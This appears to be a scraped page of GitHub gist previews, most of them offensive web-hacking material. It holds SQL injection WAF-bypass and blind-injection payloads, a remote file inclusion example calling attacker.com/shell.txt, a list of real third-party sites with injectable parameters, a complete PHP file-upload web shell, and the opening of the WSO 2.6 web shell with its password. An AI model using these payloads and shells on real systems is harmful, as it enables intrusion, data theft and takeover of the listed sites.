This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import http from "k6/http"; | |
| import { check, sleep } from "k6"; | |
| export default function() { | |
| const res = http.get("https://www.electionsquare.info/election-square/2020-election/eyJpdiI6IlpYbEp2Nm1RdGt6V2hwNm5wMmhBWWc9PSIsInZhbHVlIjoiVG91SDVvUENcLzVJOExKQ3lJWmtJSHJFNTFjd1MxU0N6aVFCRklKXC91MTVFPSIsIm1hYyI6ImRhNjYyYmU5YmRiZTA1NjZkNjZlNDM1Zjc0M2Q0YWM2M2E5ZjhiMTRjYzdlMWY3NmRlMDBmYWU0NTY1Y2EwZTUifQ=="); | |
| check(res, { | |
| "protocol is HTTP/2": (r) => r.proto === 'HTTP/2.0' | |
| }); | |
| sleep(1); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SQLI Injction WAF Bypass Methods With Details | |
| ———————————————- | |
| –‘- : +–+ / : — – : –+- : /* | |
| ) order by 1– – | |
| ‘) order by 1– – | |
| ‘)order by 1%23%23 | |
| %’)order by 1%23%23 | |
| Null’ order by 100–+ | |
| Null’ order by 9999–+ | |
| ‘)group by 99– – |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| File Include | |
| ## 1) Direct Remote Include | |
| Including php file in text format directly | |
| ``` | |
| http://www.site.com/lfi.hpp?page=http://attacker.com/shell.txt | |
| ``` | |
| ## 2) Data:text/plain | |
| Including php code through data stream |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://myanmarsubtitlemovie.com/search.php | |
| https://www.actiontrucks.com/search?find= | |
| https://forums.asianbandar.com/searchmemberposts.cfm?membername= | |
| https://love.hu/?inviter= | |
| https://www.ukrinform.ru/?params[query]= | |
| https://www.magenet.com/?email= |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1' AND 1=1--+ == True | |
| 1' AND 1=0--+ == False | |
| for version check | |
| 1' AND (ascii(substr((select version()),1,1))) = 53 --+ // 53 = 5 | |
| for database lenght check | |
| 1' AND (ascii(substr((select length(database())),1,1))) = 56--+ //56 = 8 | |
| for database check |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $lang = 'auto'; | |
| /* Homedir: | |
| * For example: './' - the script's directory | |
| */ | |
| $homedir = './'; | |
| /* Size of the edit textarea |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Query Type | |
| DDL - Definition ( Database, Table, Column ) | |
| DCL - Control ( Account, Permission ) | |
| DML - Manipulation ( Record CRUD ) | |
| -- DDL - Data Definition Language -- | |
| CREATE DATABASE `db-name`; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>n003</b><br><br>'; } else { echo '<b>Upload Sucess !!!</b><br><br>'; } } ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* WSO 2.6 (404 Error Web Shell by Madleets.com) */ | |
| /*Maded by DrSpy*/ | |
| $auth_pass = "2a9d119df47ff993b662a8ef36f9ea20"; //p4ssw0rd | |
| $color = "#00ff00"; | |
| $default_action = 'FilesMan'; | |
| $default_use_ajax = true; | |
| $default_charset = 'Windows-1251'; | |
| if(!empty($_SERVER['HTTP_USER_AGENT'])) { |
NewerOlder